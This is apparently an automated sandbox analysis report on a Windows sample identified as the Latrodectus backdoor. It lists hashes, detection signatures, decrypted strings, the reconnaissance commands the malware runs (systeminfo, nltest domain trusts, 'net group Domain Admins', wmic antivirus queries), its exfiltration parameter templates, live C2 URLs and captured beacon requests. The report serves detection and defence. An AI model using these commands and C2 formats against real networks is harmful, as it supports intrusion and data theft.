Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name: 360total.dll.dll
(renamed file extension from exe to dll)
Original sample name: 360total.dll.exe
Analysis ID: 1431883
MD5: 74143402c40ac2e61e9f040a2d7e2d00
SHA1: 4053dc85bb86c47c63f96681d6a62c21cd6342a3
SHA256: 1625ac230aa5ca950573f3ba0b1a7bd4c7fbd3e3686f9ecd4a40f1504bf33a11
Tags: exe
Infos:

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Deletes itself after installation
PE file contains section with special chars
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Unidentified 111 (Latrodectus), Latrodectus First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection
barindex
Found malware configuration
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
Sample uses string decryption to hide its real strings
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c ipconfig /all
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c systeminfo
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c nltest /domain_trusts
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net view /all /domain
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net view /all
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &ipconfig=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net config workstation
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c whoami /groups
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &systeminfo=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &domain_trusts=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &domain_trusts_all=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_view_all_domain=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_view_all=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_group=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &wmic=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_config_ws=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_wmic_av=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &whoami_group=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "pid":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%d",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "proc":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "subproc": [
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &proclist=[
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "pid":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%d",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "proc":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "subproc": [
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &desklinks=[
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: *.*
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Update_%x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Custom_update
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: .dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: .exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Updater
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: rundll32.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s", %s %s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: runnung
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: :wtfbbq
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: files/bp.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s\%d.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %d.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s\%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: init -zzzz="%s\%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: front
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /files/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Facial
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: !"$%&()*wp
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: .exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: POST
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: GET
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: curl/7.88.1
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: CLEARURL
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: URLS
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: COMMAND
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: ERROR
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: <html>
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: <!DOCTYPE
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s%d.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: 12345
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &stiller=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s%d.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: LogonTrigger
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %x%x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: TimeTrigger
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: PT0H%02dM
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &mac=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %02x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: :%02x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: PT0S
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &computername=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &domain=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: \*.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: \Registry\Machine\
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: https://jarinamaers.shop/live/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: https://wrankaget.site/live/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: AppData
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Desktop
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Startup
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Personal
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Local AppData
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: \update_data.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: URLS
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: URLS|%d|%s
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_000000018003BC0C
Source: unknown HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr

Spreading
barindex
Performs a network lookup / discovery via net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain Jump to behavior
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000203431CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000203431C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 9_2_000002238013A350
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380131A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 9_2_0000022380131A08

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.136.103 443 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://wrankaget.site/live/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C4F58 InternetReadFile, 4_2_00000203431C4F58
Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: grizmotras.com
Source: unknown HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr String found in binary or memory: ftp://ftp%2desktop.ini
Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr String found in binary or memory: http://dr.f.360.cn/scanlist
Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: Amcache.hve.8.dr String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/g
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/U
Source: rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/p
Source: rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/7
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/7-
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/&
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/4K&
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/dOIDInfo
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/n
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/rs
Source: rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: 360total.dll.dll Static PE information: section name: yhDm^
Source: Update_79066994.dll.4.dr Static PE information: section name: yhDm^
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C78C0 NtReadFile, 4_2_00000203431C78C0
